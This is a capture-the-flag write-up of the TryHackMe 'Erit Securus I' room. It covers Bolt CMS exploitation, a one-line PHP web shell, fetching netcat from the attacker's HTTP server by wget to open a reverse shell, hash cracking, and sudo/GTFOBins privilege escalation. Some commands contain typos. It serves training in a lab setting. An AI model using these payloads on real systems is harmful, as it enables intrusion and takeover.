TryHackMe Erit Securus I room Write-up

Hi everyone, I am Cursemagic. Today, I would like to share a write-up for Erit Securus I room created by 4ndr34zz from the TryHackMe platform. Without further ado, let’s get started.

Link to TryHackMe Erit Securus I room: https://tryhackme.com/room/eritsecurusi

Task 2 Reconnaissance

Run Nmap.

There are two ports: port 22 and port 80.

Task 3 WebServer

What CMS is the website built of?

Ans: Bolt

Task 4 Exploit

Go download the script given by the creator. And we know it is in python.

For the password for the login page, I look for the hint beside and it gave me the answer.

Task 5 Reverse Shell

Run the command based on the following:

python3 <Path-to-Exploit> <URL> <Username> <Password>

Enter id into the terminal and we can get the following:

Run,

echo ‘<?php system($_GET[“cmd”]);?>’cmd.php

In this part, I changed the c to cmd, as I think it might be wrong ( I am not sure of it) as the command provided afterwards seems odd. Such as the creator created c.php but the below command changed to cmd.php which does not make any sense to me.

And we can see cmd.php is created.

After that, run command:

ln -s $(which nc) .

I set up a simple HTTP server using python command: (either can be used)

python3 -m http.server <PORT>
python -m SimpleHTTPServer <PORT>

Then, this part cost me a very long time to realize or to understand. The command is not meant to be entered in the terminal but at the web browser’s URL. This is where I think the explanation does not mention in detail as it just stated “browse” in the task and I am not aware of it. Hope this will help some of the users which get stuck.

http:<machine-IP>/files/cmd.php?cmd=wget http://<LOCAL_IP>/nc

Next,

http://<MACHINE-IP>/files/cmd.php?=cmd=chmod 755 nc

Set up our netcat.

Run nc on the target machine. (using browser)

We will see the nc receive connection. And run python pty to stabilize the shell.

Task 6 Priv esc

Search for app/database directory and change directory to it and enter command file bolt.db.

By using sqlite3, we read the database.

The following steps can be viewed from the task. For the user’s hash, we can run john to crack the hash.

Now lest switch user.

Now locate the flag1.txt!

Task 7 Pivoting

Now, use ssh to login to the server. (Must ssh using the wileec terminal)

Run sudo -l

Go to GTFOBins and search zip. Now we can use the command line to exploit the shell.

Run TF=$(mktemp -u) before running the below ones.

Now we are jsmith!

Task 8 Privesc #2

Now, use the find command to locate the flag2.txt.

Task 9 Root

Now run sudo -l as jsmith.

Great. All.

And we are done! Finally!

This room is quite long and challenging at some point. But we can still manage to complete it!

Thanks for reading my write-up!

###########################################

Anyone willing to gift me free vouchers for any platform is greatly appreciated! XD

###########################################